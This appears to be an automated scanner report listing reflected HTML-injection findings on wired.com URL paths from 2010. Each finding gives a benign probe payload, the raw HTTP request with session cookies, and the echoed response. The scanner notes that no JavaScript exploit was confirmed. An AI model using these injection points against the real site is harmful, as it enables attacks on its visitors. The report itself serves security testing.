This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedf606f"><a>222e926617f/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:15 GMT
Date: Mon, 22 Nov 2010 01:11:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf606f"><a>222e926617f">
...[SNIP]...

1.28. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3862"><a>16338f02f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxe3862"><a>16338f02f90/widgets/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe3862"><a>16338f02f90 ss_widgets c_related">
...[SNIP]...

1.29. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9a4"><a>f176c1e030e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgetseb9a4"><a>f176c1e030e/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetseb9a4"><a>f176c1e030e c_related">
...[SNIP]...

1.30. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a940d"><a>ad6ce4969ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relateda940d"><a>ad6ce4969ca/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relateda940d"><a>ad6ce4969ca">
...[SNIP]...

1.31. http://www.wired.com/blogs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /blogs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e36"><a>663daf42f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blogs37e36"><a>663daf42f79 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 22:29:37 GMT
Date: Sun, 21 Nov 2010 22:25:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogs37e36"><a>663daf42f79">
...[SNIP]...

1.32. http://www.wired.com/blogs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /blogs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7458"><a>0bc4e457d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blogsb7458"><a>0bc4e457d49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Sun, 21 Nov 2010 20:14:10 GMT
Date: Sun, 21 Nov 2010 20:10:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogsb7458"><a>0bc4e457d49">
...[SNIP]...

1.33. http://www.wired.com/cars [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 808a6"><a>226b4160ebe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars808a6"><a>226b4160ebe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars808a6"><a>226b4160ebe">
...[SNIP]...

1.34. http://www.wired.com/cars/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 847ce"><a>650bafdb219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars847ce"><a>650bafdb219/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:15:22 GMT
Date: Sun, 21 Nov 2010 20:11:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars847ce"><a>650bafdb219">
...[SNIP]...

1.35. http://www.wired.com/cars/coolwheels [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/coolwheels

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215d7"><a>d31fce4364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars215d7"><a>d31fce4364/coolwheels HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:51 GMT
Date: Sun, 21 Nov 2010 23:05:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars215d7"><a>d31fce4364 ss_coolwheels">
...[SNIP]...

1.36. http://www.wired.com/cars/coolwheels [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/coolwheels

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a5e"><a>3d542f5f695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/coolwheelsf0a5e"><a>3d542f5f695 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29323
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_coolwheelsf0a5e"><a>3d542f5f695">
...[SNIP]...

1.37. http://www.wired.com/cars/energy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/energy

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d8b"><a>cd4df970211 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars93d8b"><a>cd4df970211/energy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:53 GMT
Date: Sun, 21 Nov 2010 23:05:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars93d8b"><a>cd4df970211 ss_energy">
...[SNIP]...

1.38. http://www.wired.com/cars/energy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/energy

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3cd"><a>1fe87d440bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/energy1a3cd"><a>1fe87d440bf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=554
Expires: Sun, 21 Nov 2010 23:15:34 GMT
Date: Sun, 21 Nov 2010 23:06:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_energy1a3cd"><a>1fe87d440bf">
...[SNIP]...

1.39. http://www.wired.com/cars/futuretransport [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/futuretransport

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a14"><a>265d8487a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /carse5a14"><a>265d8487a92/futuretransport HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_carse5a14"><a>265d8487a92 ss_futuretransport">
...[SNIP]...

1.40. http://www.wired.com/cars/futuretransport [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/futuretransport

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c73"><a>e09bc35649e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/futuretransport36c73"><a>e09bc35649e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=583
Expires: Sun, 21 Nov 2010 23:16:08 GMT
Date: Sun, 21 Nov 2010 23:06:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_futuretransport36c73"><a>e09bc35649e">
...[SNIP]...

1.41. http://www.wired.com/culture [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8402"><a>edd50cf471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee8402"><a>edd50cf471 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29238
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:14 GMT
Date: Mon, 22 Nov 2010 01:11:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee8402"><a>edd50cf471">
...[SNIP]...

1.42. http://www.wired.com/culture/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53de"><a>40592780ce4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee53de"><a>40592780ce4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29241
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:15:44 GMT
Date: Sun, 21 Nov 2010 20:11:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee53de"><a>40592780ce4">
...[SNIP]...

1.43. http://www.wired.com/culture/art [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbf8"><a>ab6cb8357ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture8dbf8"><a>ab6cb8357ba/art HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture8dbf8"><a>ab6cb8357ba ss_art">
...[SNIP]...

1.44. http://www.wired.com/culture/art [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d542"><a>e8d21a02e71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art4d542"><a>e8d21a02e71 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
